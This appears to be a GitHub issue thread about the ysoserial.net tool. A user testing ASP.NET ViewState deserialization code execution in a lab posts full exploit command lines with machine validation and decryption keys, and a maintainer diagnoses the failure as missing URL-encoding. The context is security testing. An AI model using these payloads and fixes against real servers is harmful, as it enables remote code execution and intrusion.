Hello,

I'm trying the code execution vulnerability in a lab environment where the validation key and decryption keys are known. Unfortunately, I cannot get it to work no matter what I try.
I'm using .NET 4.0.

I've tried both by setting the ViewStateGenerator and through setting the app path (and I confirm that the ViewStateGenerator value is correct). I have also tried appending ='s at the end of the generated code. I've also tried URL encoding the generated viewstate that I send through the POST request.

Nothing works. I can't even get a single echo 123 > c:\windows\temp\test.txt working. What am I doing wrong?
(I know it should throw a 500 exception, but it should also create test.txt which it doesn't)

Here are some of the codes I have tried:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --apppath="/p" --path="/p/default.aspx" --islegacy --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5" --isdebug

Also tried with giving both keys:

ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/p/default.aspx" --apppath="/p" --decryptionalg="Auto" --decryptionkey="9419E035D0FF7D8038D0DA7A21AFB4482C82E939147FB1C1B1F7EBCDDC69B617" --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5"

The generator code for the above path is 333BF894

Thanks!

I am guessing here but I think it can be because of lack of URL-encoding and the fact that it converts the + character to space if it has not been encoded.

I will close it for now but feel free to comment to re-open it if it has nothing to do with URL-encoding. I will also try to add URLencoding to the output by default in the next version.